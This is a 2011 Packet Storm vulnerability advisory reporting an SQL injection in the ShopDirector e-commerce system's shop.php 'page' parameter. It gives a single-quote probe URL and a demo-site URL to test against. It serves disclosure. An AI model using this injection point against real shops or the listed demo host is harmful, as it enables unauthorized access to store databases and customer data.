ShopDirector SQL Injection

2011-08-22T00:00:00
ID PACKETSTORM:104306
Type packetstorm
Reporter Eyup CELIK
Modified 2011-08-22T00:00:00

Description

                                        
                                            `# Exploit Title: ShopDirector (E-Commerce System) SQL Injection  
# Date: 2011  
# Author: Eyup CELIK  
# Software Link: http://www.polyspaston.com/content_shopdirector.php  
# Version: All Version  
# Tested on: All versions are Vulnerability  
  
ISSUE  
  
SQL Injection can be done using the command input  
  
Vulnerable Page:  
shop.php  
  
Example:  
shop.php?c1=Cake&c2=Test%20cake&page=<SQL Injection Code>  
  
Exploit:  
shop.php?c1=Cake&c2=Test%20cake&page='1  
  
Demo:  
http://www.sd-demo.co.uk/shop/shop.php?c1=Cake&c2=Test%20cake&page='1  
  
  
Thanks,  
  
  
Eyup CELIK  
Bilgi Teknolojileri Güvenlik Uzmani  
http://www.eyupcelik.com.tr  
`